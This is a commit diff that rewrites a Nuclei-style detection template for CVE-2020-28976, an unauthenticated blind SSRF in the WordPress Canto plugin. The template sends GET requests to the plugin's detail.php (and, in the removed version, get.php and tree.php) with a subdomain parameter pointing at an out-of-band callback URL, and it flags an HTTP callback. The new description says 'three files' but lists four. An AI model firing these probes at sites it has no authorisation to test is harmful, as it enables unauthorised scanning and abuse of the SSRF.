Add files via upload

cves/2020/CVE-2020-28976.yaml

@@ -1,30 +1,17 @@
-id: CVE-2020-28976
-
-info:
-  name: Wordpress Plugin Canto 1.3.0 - Blind SSRF (Unauthenticated)
-  author: LogicalHunter
-  severity: medium
-  description: The Canto plugin 1.3.0 for WordPress contains a blind SSRF vulnerability. It allows an unauthenticated attacker to make a request to any internal and external server via /includes/lib/detail.php?subdomain=SSRF.
-  reference:
-    - https://www.exploit-db.com/exploits/49189
-    - https://nvd.nist.gov/vuln/detail/CVE-2020-28976
-  tags: cve,cve2020,ssrf,wordpress,wp-plugin,oast,blind
-  classification:
-    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
-    cvss-score: 5.30
-    cve-id: CVE-2020-28976
-    cwe-id: CWE-918
-
-requests:
-  - method: GET
-    path:
-      - "{{BaseURL}}/wp-content/plugins/canto/includes/lib/detail.php?subdomain={{interactsh-url}}"
-      - "{{BaseURL}}/wp-content/plugins/canto/includes/lib/get.php?subdomain={{interactsh-url}}"
-      - "{{BaseURL}}/wp-content/plugins/canto/includes/lib/tree.php?subdomain={{interactsh-url}}"
-
-    stop-at-first-match: true
-    matchers:
-      - type: word
-        part: interactsh_protocol
-        words:
-          - "http"
+id: CVE-2020-28976
+info:
+  name: Canto <= 2.1.1 - Unauthenticated Blind SSRF
+  author: pussycat0x
+  severity: medium
+  description: The plugin is affected by Blind SSRF issues via the domain parameter in three files: /includes/lib/tree.php, /includes/lib/detail.php, /includes/lib/get.php and /includes/lib/download.php. All requests to the arbitrary domain/IP will be made with the HTTPS protocol
+  reference: https://wpscan.com/vulnerability/29c89cc9-ad9f-4086-a762-8896eba031c6 
+  tags: wordpress,ssrf
+requests:
+  - method: GET
+    path:
+      - '{{BaseURL}}/wp-content/plugins/canto/includes/lib/detail.php?subdomain=https://{{interactsh-url}}/'
+    matchers:
+      - type: word
+        part: interactsh_protocol
+        words:
+          - "http"